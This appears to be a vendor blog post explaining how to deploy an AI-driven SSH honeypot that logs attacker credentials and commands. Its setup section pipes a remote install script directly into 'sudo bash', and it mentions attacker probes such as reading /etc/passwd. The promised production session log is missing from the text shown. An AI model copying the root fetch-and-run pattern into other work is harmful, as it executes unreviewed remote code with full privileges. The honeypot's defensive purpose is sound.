How to Set Up an SSH Honeypot That Captures Attacker Behavior
Blocking attackers is the first layer. Watching them is the second. A honeypot is a fake service that looks real enough to fool an attacker into interacting with it, while you record everything they do. The credentials they try, the commands they run, the tools they download.
Traditional honeypots are static. They present canned responses that experienced attackers recognize immediately. Inner Warden takes a different approach: the honeypot is powered by an LLM that generates realistic shell responses in real time. The attacker thinks they have a live shell. They do not.
Why run a honeypot?
Most security tools tell you that an attacker tried to get in. A honeypot tells you what they planned to do once inside. That difference matters:
- Capture credentials - see which username/password pairs are being tried. If your real passwords show up, you have a leak.
- Record TTPs - the commands an attacker runs reveal their tooling, targets, and skill level. This is threat intelligence you cannot buy.
- Waste attacker time - every second spent in a honeypot is a second not spent attacking real infrastructure.
- Early warning - honeypot activity confirms active targeting. If someone is probing your honeypot, they have already found your server.
How Inner Warden's honeypot works
Inner Warden includes a built-in SSH honeypot that runs on port 2222 by default. When an attacker connects, they see what looks like a real SSH login prompt. If they authenticate (any credentials work), they land in a fake shell.
The shell is not scripted. It is generated by an AI provider that simulates a realistic Linux environment. Run ls, get a directory listing. Run cat /etc/passwd, get a realistic file. Run wget, and the honeypot pretends to download. Every interaction is logged.
Real session from production
Here is a real honeypot session captured on our production server. The attacker IP was 203.0.113.55.
The "tyty" command is interesting. It suggests the attacker was testing if the shell was responsive before running their real payload. They never got the chance. The session was logged, the IP was blocked, and the credentials they tried were recorded for analysis.
What you learn from honeypot data
After running the honeypot for a few weeks, patterns emerge:
- Top credential pairs - which username/password combinations are being tried most. If any match real accounts, change them immediately.
- Post-compromise playbooks - the first commands attackers run reveal their goals. Crypto miners download from specific URLs. Botnet agents check for specific processes. Ransomware looks for specific file types.
- Attacker origins - GeoIP and ASN data across honeypot sessions shows which hosting providers and regions are targeting you.
- Time patterns - when attacks peak tells you about the attacker's timezone and automation schedule.
Set it up
Install Inner Warden. The honeypot is part of the agent and starts automatically when enabled.
curl -fsSL https://innerwarden.com/install | sudo bashConfigure an AI provider so the honeypot can generate realistic responses:
innerwarden configure aiThe honeypot listens on port 2222 by default. You can adjust this in the configuration. For best results, set up a port redirect from port 22 to 2222 on a secondary IP, or run your real SSH on a non-standard port.
Verify it is running:
innerwarden statusWhat to do next
A honeypot works best alongside active defense. Pair it with:
- SSH brute-force detection - block attackers at the firewall before they reach the honeypot, or let the honeypot catch the ones that slip through.
- Threat intelligence sharing - report honeypot visitors to AbuseIPDB so other servers get advance warning.
- Telegram notifications - get alerts when an attacker enters the honeypot. Set up with
innerwarden notify telegram.